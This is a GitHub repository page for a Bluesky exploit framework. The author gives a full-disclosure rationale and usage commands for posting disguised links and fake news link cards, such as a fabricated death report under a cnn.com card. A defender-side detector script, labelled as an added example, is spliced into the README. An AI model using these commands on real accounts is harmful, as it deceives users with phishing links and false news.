bsky-exploits

A JavaScript SDK for Bluesky and AT Protocol by qwell

Bluesky / AT Protocol vulnerability disclosures and exploit framework

GitHub Stats

183 stars
6 forks
1 contributor
0 open issues

Dates

Created: September 13, 2023
Last updated: May 8, 2025

README

The following content is from bsky-exploits's GitHub repository. All rights reserved by the original author.

Bluesky

What is this?

This repository contains exploit modules for Bluesky, using a framework that simplifies the creation of new modules as new exploits are discovered.

Why?

I have discovered a number of security vulnerabilities in Bluesky and atproto. Each time I've found something new, I've chosen to report it to Bluesky at security@bsky.app, as requested at https://bsky.app/.well-known/security.txt, and provide them with details.

Bluesky has responded to only one of these reports, one time, 4 days after submission, saying "We appreciate the report, and we'll be taking a closer look at the issue." They did not follow up on that report and they have not responded to any of my other reports.

One particular issue that I first reported a month earlier was reported to Bluesky again, separately and unknowingly, by a second security researcher and a partial fix was committed later that day; however, Bluesky did not follow up with me to verify that the commit fully solved the issue (it did not) and there has been no acknowledgement publicly or privately of my contributions.

As a security researcher, I take security extremely seriously. It has become apparent to me that Bluesky does not take it quite so seriously.

Bluesky has been made aware on numerous occasions that the safety of all Bluesky users has been and continues to be at risk, yet they choose to do nothing.

If releasing tools to exploit these issues is what it takes to ensure that Bluesky begins to take security seriously and actually keep their users safe, then so be it. This is not the route I wanted to go, but they forced my hand.

It's written in TypeScript? Really?

Yes. Fight me. I threw it all together in a single evening (with eslint and prettier, even) -- you shouldn't really expect much from this.

Exploit List

post-disguised-link

yarn start exploit pdl --auth-token '...' --post 'Benign text with fake URL: https://google.com/search?q=puppies' --uri 'https://nefarioussite.com/' --start 27 --length 35

Creates a post with the text --post, which contains a disguised link to --uri, using --length characters starting from --start as the link text.

Rendered post, as shown in the Bluesky client:

Jason Parker @handle.invalid · 12m
Benign text with fake URL: https://google.com/search?q=puppies
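The post-disguised-link module works because a rich-text link facet carries its own target URI, independent of the text it is drawn over. The defender-side counterpart is to read the stored post record and compare the two. The following is an added example, not code from the bsky-exploits repository or from Bluesky: it takes an app.bsky.feed.post record, slices each link facet's byte range out of the UTF-8 text, and flags facets whose visible text reads as a URL for a different host than the facet actually points to. Field names (index.byteStart, index.byteEnd, features[].$type, features[].uri) follow the app.bsky.richtext.facet lexicon; the sample record is constructed here, and mapping the README's --start 27 --length 35 onto byteStart 27 / byteEnd 62 is an assumption (the sample text is ASCII, so characters and bytes coincide).

```javascript
// Added example (not part of the bsky-exploits repository): a defender-side
// check that scans an app.bsky.feed.post record for link facets whose visible
// text looks like a URL but resolves to a different host than the facet target.
// Field names follow the app.bsky.richtext.facet lexicon.

// Facet offsets are byte offsets into the UTF-8 encoding of `text`, not
// JavaScript string indices, so slice on the encoded bytes. Returns null for
// an out-of-range or empty span instead of throwing.
function sliceUtf8(text, byteStart, byteEnd) {
  const bytes = Buffer.from(text, 'utf8');
  if (!Number.isInteger(byteStart) || !Number.isInteger(byteEnd)) return null;
  if (byteStart < 0 || byteEnd > bytes.length || byteStart >= byteEnd) return null;
  return bytes.subarray(byteStart, byteEnd).toString('utf8');
}

// Lower-cased hostname with a leading "www." removed, or null if unparsable.
function hostOf(url) {
  try {
    return new URL(url).hostname.toLowerCase().replace(/^www\./, '');
  } catch {
    return null;
  }
}

// Treat the visible text as URL-like only when a reader would take it for an
// address: optional scheme, a dotted host, optional path. Ordinary anchor text
// such as "puppies" is legitimate and is not flagged.
const URL_LIKE = /^(?:https?:\/\/)?(?:[\w-]+\.)+[a-z]{2,}(?:[\/?#:]|$)/i;

function shownHost(shown) {
  const s = shown.trim();
  if (!URL_LIKE.test(s)) return null;
  return hostOf(/^https?:\/\//i.test(s) ? s : 'https://' + s);
}

// One finding per link facet whose displayed host differs from the host of
// the facet's real target URI.
function findDisguisedLinks(record) {
  const findings = [];
  for (const facet of record.facets ?? []) {
    const { byteStart, byteEnd } = facet.index ?? {};
    const shown = sliceUtf8(record.text ?? '', byteStart, byteEnd);
    if (shown === null) continue;
    for (const feature of facet.features ?? []) {
      if (feature.$type !== 'app.bsky.richtext.facet#link') continue;
      const displayedHost = shownHost(shown);
      const targetHost = hostOf(feature.uri);
      if (displayedHost && targetHost && displayedHost !== targetHost) {
        findings.push({ shown, target: feature.uri, displayedHost, targetHost });
      }
    }
  }
  return findings;
}

// Constructed sample mirroring the README's pdl invocation (assumed mapping:
// --start 27, --length 35 -> byteStart 27, byteEnd 62). The target URI is the
// README's own placeholder, not a real site of interest.
const SAMPLE_RECORD = {
  $type: 'app.bsky.feed.post',
  text: 'Benign text with fake URL: https://google.com/search?q=puppies',
  facets: [
    {
      index: { byteStart: 27, byteEnd: 62 },
      features: [{ $type: 'app.bsky.richtext.facet#link', uri: 'https://nefarioussite.com/' }],
    },
  ],
};

// Constructed honest post: the facet target matches the displayed address
// (a "www." prefix on the target is normalised away and not treated as a mismatch).
const HONEST_RECORD = {
  $type: 'app.bsky.feed.post',
  text: 'Search: https://google.com/search?q=puppies',
  facets: [
    {
      index: { byteStart: 8, byteEnd: 43 },
      features: [{ $type: 'app.bsky.richtext.facet#link', uri: 'https://www.google.com/search?q=puppies' }],
    },
  ],
};

if (typeof require !== 'undefined' && require.main === module) {
  console.log(findDisguisedLinks(SAMPLE_RECORD)); // one finding: google.com vs nefarioussite.com
  console.log(findDisguisedLinks(HONEST_RECORD)); // []
}
```

The same comparison can run on records as they arrive from a relay or Jetstream stream, or inside a labeler that wants to tag posts whose link text and link target disagree; client-side, the safer fix is to render the facet's real host next to any URL-looking link text rather than trusting the text alone.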

post-fake-link-card

yarn start exploit pflc --auth-token '...' --post 'Wow, neat.' --uri 'https://cnn.com/' --title 'World Leader dead at 42.' --description 'According to their spokesperson, World Leader was found dead in their home on Tuesday night. They were 42.'

Creates a post with the text --post, which includes a link card to --uri with a title of --title and description of --description.
Note: Link cards can contain arbitrary thumbnails, but they are not currently supported here.

Rendered post, as shown in the Bluesky client:

Jason Parker @handle.invalid · 12m
Wow, neat.

cnn.com
World Leader dead at 42.
According to their spokesperson, World Leader was found dead in their home on Tuesday night. They were 42.

How?

yarn build to build.
yarn start for a list of commands.
yarn start exploit to show a list of available modules.
yarn start exploit <name> [args...] to execute a particular exploit.

--auth-token can be obtained from the Authorization header, via Developer Tools in a web browser. The authorization scheme (Bearer) is added here automatically and should not be included in the argument.

Contact

Jason Parker
Email: north@ꩰ.com
Mastodon: @north@ꩰ.com / @north@fosstodon.org


License

GPL-3.0

Author

qwell

Activity

Last commit: May 8, 2025
Commit frequency: Unknown
